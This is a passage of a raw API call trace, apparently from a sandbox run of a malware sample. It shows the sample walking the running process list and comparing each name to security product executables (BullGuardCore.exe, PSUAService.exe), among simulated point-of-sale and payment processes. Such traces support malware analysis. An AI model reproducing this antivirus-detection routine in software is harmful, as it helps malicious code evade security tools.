th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0173.856] lstrcmpiW (lpString1="winscp.exe", lpString2="BullGuardCore.exe") returned 1 [0173.857] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1024, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0173.858] lstrcmpiW (lpString1="yahoomessenger.exe", lpString2="BullGuardCore.exe") returned 1 [0173.858] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0173.859] lstrcmpiW (lpString1="active-charge.exe", lpString2="BullGuardCore.exe") returned -1 [0173.859] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0173.861] lstrcmpiW (lpString1="accupos.exe", lpString2="BullGuardCore.exe") returned -1 [0173.861] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0173.862] lstrcmpiW (lpString1="afr38.exe", lpString2="BullGuardCore.exe") returned -1 [0173.862] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0173.864] lstrcmpiW (lpString1="foxmailincmail.exe", lpString2="BullGuardCore.exe") returned 1 [0173.864] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1100, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0173.865] lstrcmpiW (lpString1="ccv_server.exe", lpString2="BullGuardCore.exe") returned 1 [0173.865] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="stocklastmiddle.exe")) returned 1 [0173.867] lstrcmpiW (lpString1="stocklastmiddle.exe", lpString2="BullGuardCore.exe") returned 1 [0173.867] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whom_only.exe")) returned 1 [0173.868] lstrcmpiW (lpString1="whom_only.exe", lpString2="BullGuardCore.exe") returned 1 [0173.868] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="size-defense-course.exe")) returned 1 [0173.869] lstrcmpiW (lpString1="size-defense-course.exe", lpString2="BullGuardCore.exe") returned 1 [0173.869] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="contain.exe")) returned 1 [0173.871] lstrcmpiW (lpString1="contain.exe", lpString2="BullGuardCore.exe") returned 1 [0173.871] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0173.872] lstrcmpiW (lpString1="utg2.exe", lpString2="BullGuardCore.exe") returned 1 [0173.872] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0173.873] lstrcmpiW (lpString1="spgagentservice.exe", lpString2="BullGuardCore.exe") returned 1 [0173.873] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0173.874] lstrcmpiW (lpString1="spcwin.exe", lpString2="BullGuardCore.exe") returned 1 [0173.874] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0173.875] lstrcmpiW (lpString1="omnipos.exe", lpString2="BullGuardCore.exe") returned 1 [0173.875] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0173.876] lstrcmpiW (lpString1="mxslipstream.exe", lpString2="BullGuardCore.exe") returned 1 [0173.876] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0173.877] lstrcmpiW (lpString1="isspos.exe", lpString2="BullGuardCore.exe") returned 1 [0173.877] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0173.878] lstrcmpiW (lpString1="fpos.exe", lpString2="BullGuardCore.exe") returned 1 [0173.878] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1160, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0173.880] lstrcmpiW (lpString1="edcsvr.exe", lpString2="BullGuardCore.exe") returned 1 [0173.880] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0173.974] lstrcmpiW (lpString1="creditservice.exe", lpString2="BullGuardCore.exe") returned 1 [0173.974] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0173.975] lstrcmpiW (lpString1="centralcreditcard.exe", lpString2="BullGuardCore.exe") returned 1 [0173.975] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0173.976] lstrcmpiW (lpString1="aldelo.exe", lpString2="BullGuardCore.exe") returned -1 [0173.977] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x948, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0173.978] lstrcmpiW (lpString1="iexplore.exe", lpString2="BullGuardCore.exe") returned 1 [0173.978] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0173.979] lstrcmpiW (lpString1="backgroundTaskHost.exe", lpString2="BullGuardCore.exe") returned -1 [0173.979] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.980] lstrcmpiW (lpString1="svchost.exe", lpString2="BullGuardCore.exe") returned 1 [0173.980] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0173.981] lstrcmpiW (lpString1="backgroundTaskHost.exe", lpString2="BullGuardCore.exe") returned -1 [0173.981] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0173.983] lstrcmpiW (lpString1="backgroundTaskHost.exe", lpString2="BullGuardCore.exe") returned -1 [0173.983] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x364, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0173.984] lstrcmpiW (lpString1="msfeedssync.exe", lpString2="BullGuardCore.exe") returned 1 [0173.984] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x13f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0173.985] lstrcmpiW (lpString1="audiodg.exe", lpString2="BullGuardCore.exe") returned -1 [0173.985] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="d1d622e31d20a69fc6fea0d98996607f37f6204bb02625bfb329cfdbb8edb6e6.exe")) returned 1 [0173.987] lstrcmpiW (lpString1="d1d622e31d20a69fc6fea0d98996607f37f6204bb02625bfb329cfdbb8edb6e6.exe", lpString2="BullGuardCore.exe") returned 1 [0173.987] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="d1d622e31d20a69fc6fea0d98996607f37f6204bb02625bfb329cfdbb8edb6e6.exe")) returned 0 [0174.043] NtClose (Handle=0xbc) returned 0x0 [0174.090] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xbc [0174.105] Process32FirstW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0174.106] lstrcmpiW (lpString1="[System Process]", lpString2="PSUAService.exe") returned -1 [0174.107] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0174.108] lstrcmpiW (lpString1="System", lpString2="PSUAService.exe") returned 1 [0174.108] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0174.109] lstrcmpiW (lpString1="smss.exe", lpString2="PSUAService.exe") returned 1 [0174.109] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0174.110] lstrcmpiW (lpString1="csrss.exe", lpString2="PSUAService.exe") returned -1 [0174.110] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0174.111] lstrcmpiW (lpString1="wininit.exe", lpString2="PSUAService.exe") returned 1 [0174.111] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0174.112] lstrcmpiW (lpString1="csrss.exe", lpString2="PSUAService.exe") returned -1 [0174.112] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0174.113] lstrcmpiW (lpString1="winlogon.exe", lpString2="PSUAService.exe") returned 1 [0174.113] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1bc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0174.114] lstrcmpiW (lpString1="services.exe", lpString2="PSUAService.exe") returned 1 [0174.114] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1bc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0174.115] lstrcmpiW (lpString1="lsass.exe", lpString2="PSUAService.exe") returned -1 [0174.115] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.116] lstrcmpiW (lpString1="svchost.exe", lpString2="PSUAService.exe") returned 1 [0174.116] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.117] lstrcmpiW (lpString1="svchost.exe", lpString2="PSUAService.exe") returned 1 [0174.117] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0174.118] lstrcmpiW (lpString1="dwm.exe", lpString2="PSUAService.exe") returned -1 [0174.118] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.119] lstrcmpiW (lpString1="svchost.exe", lpString2="PSUAService.exe") returned 1 [0174.119] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.120] lstrcmpiW (lpString1="svchost.exe", lpString2="PSUAService.exe") returned 1 [0174.120] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.121] lstrcmpiW (lpString1="svchost.exe", lpString2="PSUAService.exe") returned 1 [0174.121] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.122] lstrcmpiW (lpString1="svchost.exe", lpString2="PSUAService.exe") returned 1 [0174.122] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.123] lstrcmpiW (lpString1="svchost.exe", lpString2="PSUAService.exe") returned 1 [0174.123] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x190, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.126] lstrcmpiW (lpString1="svchost.exe", lpString2="PSUAService.exe") returned 1 [0174.126] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x44c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.127] lstrcmpiW (lpString1="svchost.exe", lpString2="PSUAService.exe") returned 1 [0174.127] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0174.131] lstrcmpiW (lpString1="spoolsv.exe", lpString2="PSUAService.exe") returned 1 [0174.131] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x364, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0174.132] lstrcmpiW (lpString1="sihost.exe", lpString2="PSUAService.exe") returned 1 [0174.132] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x648, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.133] lstrcmpiW (lpString1="svchost.exe", lpString2="PSUAService.exe") returned 1 [0174.133] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0174.134] lstrcmpiW (lpString1="SkypeHost.exe", lpString2="PSUAService.exe") returned 1 [0174.134] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x700, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0174.135] lstrcmpiW (lpString1="OfficeClickToRun.exe", lpString2="PSUAService.exe") returned -1 [0174.135] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x37, th32ParentProcessID=0x764, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0174.136] lstrcmpiW (lpString1="explorer.exe", lpString2="PSUAService.exe") returned -1 [0174.136] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0174.137] lstrcmpiW (lpString1="RuntimeBroker.exe", lpString2="PSUAService.exe") returned 1 [0174.137] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x364, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0174.138] lstrcmpiW (lpString1="taskhostw.exe", lpString2="PSUAService.exe") returned 1 [0174.138] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x974, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0174.139] lstrcmpiW (lpString1="ShellExperienceHost.exe", lpString2="PSUAService.exe") returned 1 [0174.139] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0174.140] lstrcmpiW (lpString1="SearchUI.exe", lpString2="PSUAService.exe") returned 1 [0174.140] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.141] lstrcmpiW (lpString1="svchost.exe", lpString2="PSUAService.exe") returned 1 [0174.141] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0174.142] lstrcmpiW (lpString1="WmiPrvSE.exe", lpString2="PSUAService.exe") returned 1 [0174.142] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x274, pcPriClassBase=10, dwFlags=0x0, szExeFile="SystemSettingsBroker.exe")) returned 1 [0174.143] lstrcmpiW (lpString1="SystemSettingsBroker.exe", lpString2="PSUAService.exe") returned 1 [0174.143] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x364, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0174.144] lstrcmpiW (lpString1="WMIADAP.exe", lpString2="PSUAService.exe") returned 1 [0174.144] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0174.145] lstrcmpiW (lpString1="WmiPrvSE.exe", lpString2="PSUAService.exe") returned 1 [0174.145] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x948, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0174.146] lstrcmpiW (lpString1="iexplore.exe", lpString2="PSUAService.exe") returned -1 [0174.146] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, 